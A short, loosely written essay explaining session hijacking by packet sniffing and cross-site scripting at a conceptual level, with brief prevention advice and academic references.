Session hijacking is a form of TCP/IP attack whereby the attacker makes use of a packet sniffer to for the stealing of a HTTP session. This is done by attackers mostly when the authentication between a client and a server is weak especially when the session is initializing. A sniffer packet serves to observe and capture packets. Once a hijack has been made, the attacker finds himself in a position to access fully the HTTP session which has been hijacked. This implies that the attacker will be able to check on various communication and effected changes as between the client and the webserver as that information will flow from client to the server then from the server to the attacker and back to the server.
There is also another way through which attackers effect session hijacking which may not be known to the clients. One of these was is by cross-site scripting, which may also be categorised as another form of TCP attack. This is done by injecting codes which are malicious into browsers or applications used to access the web and this is on the side of a client.
This form of session hijacking serves to steal tokens associated to the clients’ session or cookies that are reserved to a legitimate client or even to steal the client’s session as it is and transmit the same to the attacker.
There are a number of ways through session hijacking can be overcome or prevented by clients or by web servers. The perfect of ways to overcome this is not to allow scripts running on a website while using a web server. This however implies that the client will miss out on certain features on the website. This problem can also be solved allowing for tighter security controls especially when it comes to authentication on websites using cookies.
Gill, R., Smith, J., & Clark, A. (2006, January). Experiences in passively detecting session hijacking attacks in IEEE 802.11 networks. In Proceedings of the 2006 Australasian workshops on Grid computing and e-research-Volume 54 (pp. 221-230). Australian Computer Society, Inc..
Noiumkar, P., & Chomsiri, T. (2008, November). Top 10 free web-mail security test using session Hijacking. In Convergence and Hybrid Information Technology, 2008. ICCIT’08. Third International Conference on (Vol. 2, pp. 486-490). IEEE.
Kolšek, M. (2002). Session fixation vulnerability in web-based applications. Acros Security, 7.
Johns, M. (2006). SessionSafe: Implementing XSS immune session handling. In Computer Security–ESORICS 2006 (pp. 444-460). Springer Berlin Heidelberg.